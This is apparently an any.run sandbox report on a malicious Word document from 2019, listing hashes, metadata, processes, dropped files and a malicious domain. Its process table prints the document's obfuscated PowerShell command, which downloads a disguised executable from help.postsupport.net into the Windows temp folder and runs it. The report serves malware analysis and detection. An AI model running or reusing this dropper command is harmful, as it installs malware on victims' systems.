File name: | 6f3badceca5e4efea401c34134544d73f19a79f7ffb1401c66e795e5181624ec |
Full analysis: | https://app.any.run/tasks/bbe06f80-cb02-447e-8ab7-c827ebc520f7 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 06:27:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: , Author: dood, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Jan 16 10:16:00 2019, Last Saved Time/Date: Wed Jan 16 10:16:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | D7F30FA3CCF4F3CE1C7D89564C0EDF5F |
SHA1: | 43A1E499C7D1F6E1A0D723E179D51E8AF83994EA |
SHA256: | 6F3BADCECA5E4EFEA401C34134544D73F19A79F7FFB1401C66E795E5181624EC |
SSDEEP: | 3072:8TTwHo66OblnBQMFCESpcSO6iNAATCdOSrv5:LHXRblnBvFCESpcSz |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | |
---|---|
Subject: | - |
Author: | dood |
Keywords: | - |
Template: | Normal.dotm |
LastModifiedBy: | Admin |
RevisionNumber: | 2 |
Software: | Microsoft Office Word |
TotalEditTime: | 1.0 minutes |
CreateDate: | 2019:01:16 10:16:00 |
ModifyDate: | 2019:01:16 10:16:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | home |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | ???????? Microsoft Word 97-2003 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3528 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6f3badceca5e4efea401c34134544d73f19a79f7ffb1401c66e795e5181624ec.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1692 | powershell $bHzZ8j = '$bILM07V = 30936.458089142new30936.458089142-obj30936.458089142ect net30936.458089142.web30936.458089142cli30936.458089142ent; $bILM07V.dow30936.458089142nlo30936.458089142a30936.458089142dfi30936.458089142le(\"h30936.458089142t30936.458089142t30936.458089142p://help.postsupport.net/qwydbbcdu.png?bg=sp20\", \"c:\win30936.458089142dows\t30936.458089142emp\put30936.458089142ty.ex30936.458089142e\"); 30936.458089142s30936.458089142tar30936.458089142t-p30936.458089142ro30936.458089142ces30936.458089142s \"c:\windo30936.458089142ws\temp\p30936.458089142utt30936.458089142y.ex30936.458089142e\";'.replace('30936.458089142', $MNA1S2zrx);iex($bHzZ8j); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD07F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DNX0RX326AQHGN8DJMFB.temp | — | |
MD5:— | SHA256:— | |||
1692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
1692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17d987.TMP | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A007ECCE225F5CE4BE0F2923681B83B3 | SHA256:4A18D40A7B4AC9CA7709652BBBAAB9D1B2A70FE3D6A247024553CDD4B08D73CB | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:484888728EC96FD20CAF9600CA8B39A8 | SHA256:494D488C5E8FCDC84B18357AD4075A21C6958D147ED5D90B0491364443B48FD4 | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$3badceca5e4efea401c34134544d73f19a79f7ffb1401c66e795e5181624ec.doc | pgc | |
MD5:478A2038B1582D7102C6F916BCBCEB87 | SHA256:38B8648B2E880C980C6783F155203C7A7E210099F9370C49016C690D37506257 |
Domain | IP | Reputation |
---|---|---|
help.postsupport.net |
| malicious |